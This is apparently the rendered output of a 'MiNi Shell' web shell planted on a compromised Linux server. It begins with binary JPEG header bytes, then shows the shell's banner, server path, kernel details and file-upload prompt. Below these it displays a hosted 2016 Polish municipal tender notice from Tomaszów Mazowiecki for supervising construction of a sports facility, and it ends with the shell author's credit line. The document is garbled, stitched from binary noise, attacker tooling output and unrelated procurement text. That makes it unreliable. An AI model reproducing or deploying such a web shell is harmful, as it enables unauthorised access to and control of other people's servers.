JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160708/125693-N-2016.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Wykonanie kompleksowego nadzoru inwestorskiego w fazie projektowania i realizacji inwestycji związanej z realizacją zadania                 pn. Budowa obiektu sportowego wraz z infrastrukturą towarzyszącą przy ulicy Strzeleckiej               w Tomaszowie Mazowieckim.</b><br>
<b>Numer ogłoszenia: 125693 - 2016; data zamieszczenia: 08.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Tomaszów Mazowiecki , ul. POW 10/16, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 724 23 11, faks 44 724 43 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-maz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kompleksowego nadzoru inwestorskiego w fazie projektowania i realizacji inwestycji związanej z realizacją zadania                 pn. Budowa obiektu sportowego wraz z infrastrukturą towarzyszącą przy ulicy Strzeleckiej               w Tomaszowie Mazowieckim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Nadzór inwestorski przy realizacji inwestycji nad wszystkimi branżami, zgodnie  z przepisami ustawy Prawo Budowlane, warunkami technicznymi wykonania i odbioru robót, dokumentacją projektową  i innymi obowiązującymi przepisami, ze szczególnym uwzględnieniem kontroli jakości wykonywanych robót.
2)	Reprezentowanie Inwestora na budowie poprzez sprawowanie kontroli zgodności jej realizacji             z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej. 
3)	Pełnienie przez inspektora nadzoru robót w specjalności konstrukcyjno - budowlanej, funkcji koordynatora prac pozostałych inspektorów nadzoru.
4)	Współdziałanie z Wykonawcą robót na placu budowy.
5)	Współdziałanie z Koordynatorem ze strony Zamawiającego i Wykonawcy, nadzorem autorskim/projektantami, załatwianie spraw związanych z uwagami dotyczącymi rozwiązań projektowych.
6)	Współpraca ze służbami inwestorskimi oraz ekspertami powołanymi dodatkowo przez Zamawiającego.
7)	Podejmowanie działań, dotyczących:
a)	udzielania Wykonawcy robót informacji, wyjaśnień i wskazówek dotyczących kontraktu                   w odniesieniu  do nadzorowanych branż;
b)	wprowadzania niezbędnych zmian w dokumentacji technicznej i uzyskiwania zgody projektanta  na zmiany;
c)	przeprowadzania niezbędnych ekspertyz i badań technicznych;
d)	uzyskiwania od projektanta dodatkowych wyjaśnień w sprawach dotyczących projektu                        i zawartych w nim rozwiązań;
e)	wstrzymania robót w wypadku prowadzenia ich niezgodnie z kontraktem  i przepisami BHP;
f)	żądania wykonania badań dodatkowych przez Wykonawcę robót, a przede wszystkim zlecania Wykonawcy robót badań materiałów budzących wątpliwości co do jakości.
		8)	Prowadzenie dokumentacji w formie papierowej i elektronicznej z czynności 	objętych przedmiotem  zamówienia lub przydatnych inwestorowi ze względów użytkowych bądź eksploatacyjnych lub wymaganych od Koordynatora w zakresie 	nadzorowanej branży.
		9)	Wykonywanie dokumentacji fotograficznej (w technice cyfrowej) z postępu robót.
		10)	Kontrola przygotowania kompletu dokumentów do odbioru technicznego części  lub całości robót w celu zgłoszenia w organie nadzoru budowlanego zakończenia tych  robót i uzyskania pozwolenia  na użytkowanie.
		11)	Sporządzanie comiesięcznych raportów z wykonywanych czynności za okres rozliczeniowy uwzględniony w harmonogramie robót z Wykonawcą robót.
		12)	Opiniowanie konieczności wykonania robót i zamówień dodatkowych oraz ewentualnych rozwiązań zamiennych.
		13)	Udział w naradach/radach budowy organizowanych przez Wykonawcę robót na terenie budowy lub organizowanych przez Zamawiającego w jego siedzibie.
		14)	Sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych,                           a w szczególności  zapobieganie zastosowaniu wyrobów budowlanych wadliwych niedopuszczonych do stosowania budownictwie. 
		15)	Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania. 
		16)	Potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także, na żądanie inwestora,  kontrolowanie rozliczeń budowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 18 000,00 zł. (osiemnaście tysięcy złotych) w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, ubezpieczeniowych, poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o Polskiej Agencji Rozwoju Przedsiębiorczości nie później niż do upływu terminu składania ofert. Obowiązująca jest data i godzina wpływu pieniędzy (uznania kwoty) na rachunek zamawiającego. 

	Złożenie oferty niezabezpieczonej wadium będzie skutkować wykluczeniem wykonawcy z postępowania.

Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego  (58 1050 1461 1000 0023 6464 4415 Bank ING Bank Śląski). Na przelewie należy umieścić informację: Wadium - NADZÓR INWESTORSKI - BUDOWA OBIEKTU SPORTOWEGO

	Oryginał lub potwierdzoną za zgodność kopię przelewu należy dołączyć do oferty. 

Oryginał wadium w pozostałych akceptowanych przez zamawiającego formach należy dołączyć                      do składanej oferty.

Poręczenie lub gwarancja stanowiące formę wadium powinny zawierać stwierdzenie, iż jest ono nieodwołalne, oraz że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty kwoty wadium następuje jego bezwarunkowa wypłata, oraz powinny wskazywać wszystkie okoliczności uzasadniające zatrzymanie wadium określone w art. 46 ust. 4a i 5 ustawy Pzp.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie,                  o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3,                       co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
		1) 	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 					określonych w ofercie; 
		2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
		3) 	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 				leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełni warunek, jeżeli wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy             to w tym okresie wykonał, co najmniej 1 usługę polegającą na sprawowaniu funkcji Inspektora nadzoru inwestorskiego w pełnym zakresie obejmującą budowę obiektu kubaturowego                   o podobnej złożoności typu: hala sportowa, basenowa, widowiskowa (określona w pozwoleniu   na ich budowę kategorią nr XV) o podobnej  kubaturze, lecz nie mniej niż 100 000 m3                      - w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane Dz. U. tekst jednolity                   poz. 290 z dnia 9 lutego 2016 r.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował osobami, które będą uczestniczyć w realizacji zadania i spełniają poniższe wymogi: 

a)	1 inspektor nadzoru w specjalności konstrukcyjno - budowlanej:  koordynator (wszystkich pozostałych inspektorów nadzoru inwestorskiego): osoba posiadająca uprawnienie                         w specjalności konstrukcyjno - budowlanej bez ograniczeń, posiadająca min. 5 letnie doświadczenie zawodowe i nadzorowała budowę minimum 1 obiektu kubaturowego w swoim zakresie.
b)	1 inspektor nadzoru w specjalności architektonicznej: osoba posiadająca uprawnienie                 w specjalności architektonicznej bez ograniczeń,  posiadająca min. 5 letnie doświadczenie zawodowe oraz nadzorowała budowę minimum jednego obiektu kubaturowego w swoim zakresie.
c)	1 inspektor nadzoru w specjalności inżynieryjnej drogowej: osoba posiadająca uprawnienia            w specjalności drogowej i posiadająca min. 5 letnie doświadczenie zawodowe oraz nadzorowała min. jedną inwestycję drogową o wartości kosztorysowej  min. 120 tys. zł. brutto.
d)	1 inspektor nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych i wentylacyjnych: osoba posiadająca min. 5 letnie doświadczenie zawodowe oraz nadzorowała budowę minimum jednego obiektu kubaturowego w swoim zakresie.
e)	1 inspektor nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych: osoba posiadająca min. 5 letnie doświadczenie zawodowe oraz nadzorowała budowę minimum jednego obiektu kubaturowego w swoim zakresie.
f)	1 inspektor nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych: osoba posiadająca min. 5 letnie doświadczenie zawodowe oraz nadzorowała budowę minimum jednego obiektu kubaturowego w swoim zakresie.
Zamawiający informuje, że pod pojęciem obiekt kubaturowy będzie rozumiał obiekty zakwalifikowane w pozwoleniach budowlanych na ich realizację do kat. XV wg Prawa budowlanego tj: budynki sportu i rekreacji, jak: hale sportowe i widowiskowe, kryte baseny.

Zamawiający dopuszcza uprawnienia równoważne - dla osoby, która posiada uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane, uprawnienia lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji                  w budownictwie i zachowała uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.

Zamawiający dopuszcza równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach 	członkowskich Unii Europejskiej  Dz. U. 2008, nr 63, poz. 394 ze zm.).

	Wykonawca wybrany do realizacji zamówienia niezwłocznie po podpisaniu umowy w sprawie zamówienia publicznego przekazuje zamawiającemu:
				- uprawnienia kwalifikacji zawodowych osób, 
				- aktualne zaświadczenia o przynależności do właściwej izby samorządu zawodowego.

Zamawiający informuje - że 5 letnie doświadczenie zawodowe liczone będzie od dnia zdobycia uprawnień budowlanych.
	
	Zamawiający dopuszcza zmniejszenie ilości osób zespołu inspektorów w przypadku posiadania przez jednego inspektora dwóch lub więcej specjalności uprawnień bez ograniczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia warunek, jeżeli wykaże, iż: posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 500 000,00  PLN - (pięćset tysięcy złotych brutto),

	Ocena spełnienia warunku zostanie dokonana na podstawia przedłożonej informacji z banku lub SKOK.
	UWAGA: 
	W przypadku złożenia przez wykonawców dokumentów zawierających dane i wartości w walutach innych 	niż polski złoty (PLN), zamawiający jako kurs przeliczeniowy waluty przyjmie kurs średni waluty obcej 	według Narodowego Banku Polskiego (www.nbp.gov.pl) z dnia zamieszczenia ogłoszenia o zamówieniu 	w Biuletynie Zamówień Publicznych (BZP). W przypadku braku ogłoszenia średniego kursu waluty obcej 	w dniu publikacji ogłoszenia o zamówieniu w BZP, zamawiający, jako kurs przeliczeniowy przyjmie kurs 	ogłoszony przez Narodowy Bank Polski w najbliższym dniu po zamieszczeniu ogłoszenia w BZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz oferty,
			Pełnomocnictwo, (jeżeli dotyczy),
			Pisemne zobowiązanie podmiotu trzeciego (jeżeli dotyczy),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - KWALIFIKACJE ZAWODOWE I DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI ZAMÓWIENIA - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany terminu realizacji przedmiotu zamówienia                     w przypadku:
1)	wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego lub wykonawcy robót budowlanych,
2)	działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których strony umowy nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie umowy zgodnie z jej treścią w szczególności: działania wojenne, powódź, akty wandalizmu, awarie, katastrofy,
3)	konieczność realizacji robót dodatkowych, zamiennych, działania mających na celu                       w niezwłoczne usunięcia bezpośredniego zagrożenia bezpieczeństwa ludzi lub mienia,
4)	zmiany przepisów prawa mająca wpływ na zakres lub termin wykonania przedmiotu umowy,
5)	znaleziska archeologiczne, wojenne itp. prowadzące do konieczności wstrzymania robót,
6)	przedłużające się w stosunku do obowiązujących przepisów, procedury                            i postępowania administracyjne, cywilne, karne, w szczególności wydanie przez uprawnione organy decyzji o wstrzymaniu robót, z powodów za które Wykonawca nie ponosi odpowiedzialności.
7)	działania osób trzecich niezależne od stron umowy uniemożliwiające lub znacznie utrudniające wykonanie umowy we wskazanych terminach,
2.	Zamawiający dopuszcza możliwość zmiany wynagrodzenia w przypadku ustawowej zmiany podatku od towarów i usług (VAT).
3.	Zamawiający dopuszcza zmianę osób wskazanych do pełnienia funkcji koordynatorów prac oraz inspektorów nadzoru z zachowaniem ciągłości nadzoru. W celu dokonania zmiany inspektora nadzoru wykonawca zobowiązany jest uzgodnić nową kandydaturę z zamawiającym                          i przedstawić dokumenty potwierdzające uprawnienia, kwalifikacje i staż wymagany dla tego stanowiska określone w ogłoszeniu o zamówieniu i SIWZ. Zmiana nie może powodować zmian wynagrodzenia określonego w § 2 niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.tomaszow.miasta.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Mościckiego 6 pok. nr 6, 97-200 Tomaszów Maz..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2016 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie zamawiającego w Tomaszowie Maz. ul. POW 10/16 pok. 12 budynek A (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com